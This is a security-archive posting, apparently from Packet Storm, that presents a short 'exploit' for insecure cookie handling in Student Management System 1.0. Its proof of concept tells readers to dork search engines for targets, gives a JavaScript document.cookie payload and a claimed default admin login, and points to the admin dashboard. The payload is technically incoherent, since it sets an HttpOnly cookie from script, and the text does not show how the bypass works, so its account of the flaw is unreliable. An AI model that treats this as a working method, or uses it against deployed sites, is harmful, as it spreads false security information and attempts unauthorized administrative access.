Headline
Student Management System 1.0 Insecure Cookie Handling
Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.
Student Management System 1.0 Insecure Cookie Handling
Posted Sep 30, 2024
Authored by indoushka
Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.
tags | exploit, insecure cookie handling
SHA-256 | d658fbfc8c6a719141fdd1f2794283b78eab23b21c7970420e8965f026849eba
Download | Favorite | View
Student Management System 1.0 Insecure Cookie Handling
====================================================================================================================================| # Title : Student Management System 1.0 Insecure Cookie Handling Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://phpgurukul.com/student-management-system-using-php-and-mysql/ |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] The default username is admin & The chosen password is user123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================
File Tags
- ActiveX (933)
- Advisory (86,997)
- Arbitrary (17,113)
- BBS (2,859)
- Bypass (1,932)
- CGI (1,047)
- Code Execution (7,925)
- Conference (693)
- Cracker (845)
- CSRF (3,434)
- DoS (25,304)
- Encryption (2,395)
- Exploit (54,342)
- File Inclusion (4,278)
- File Upload (1,022)
- Firewall (822)
- Info Disclosure (2,924)
- Intrusion Detection (919)
- Java (3,156)
- JavaScript (908)
- Kernel (7,310)
- Local (14,864)
- Magazine (587)
- Overflow (13,228)
- Perl (1,435)
- PHP (5,284)
- Proof of Concept (2,413)
- Protocol (3,751)
- Python (1,662)
- Remote (31,922)
- Root (3,672)
- Rootkit (530)
- Ruby (643)
- Scanner (1,660)
- Security Tool (8,052)
- Shell (3,308)
- Shellcode (1,219)
- Sniffer (904)
- Spoof (2,297)
- SQL Injection (16,738)
- TCP (2,463)
- Trojan (690)
- UDP (919)
- Virus (675)
- Vulnerability (33,133)
- Web (10,144)
- Whitepaper (3,785)
- x86 (970)
- XSS (18,306)
- Other
File Archives
- September 2024
- August 2024
- July 2024
- June 2024
- May 2024
- April 2024
- March 2024
- February 2024
- January 2024
- December 2023
- November 2023
- October 2023
- Older
Systems
- AIX (430)
- Apple (2,115)
- BSD (378)
- CentOS (61)
- Cisco (1,954)
- Debian (7,130)
- Fedora (1,693)
- FreeBSD (1,247)
- Gentoo (4,599)
- HPUX (881)
- iOS (390)
- iPhone (108)
- IRIX (220)
- Juniper (71)
- Linux (51,374)
- Mac OS X (696)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (490)
- RedHat (16,912)
- Slackware (941)
- Solaris (1,615)
- SUSE (1,444)
- Ubuntu (9,882)
- UNIX (9,461)
- UnixWare (188)
- Windows (6,780)
- Other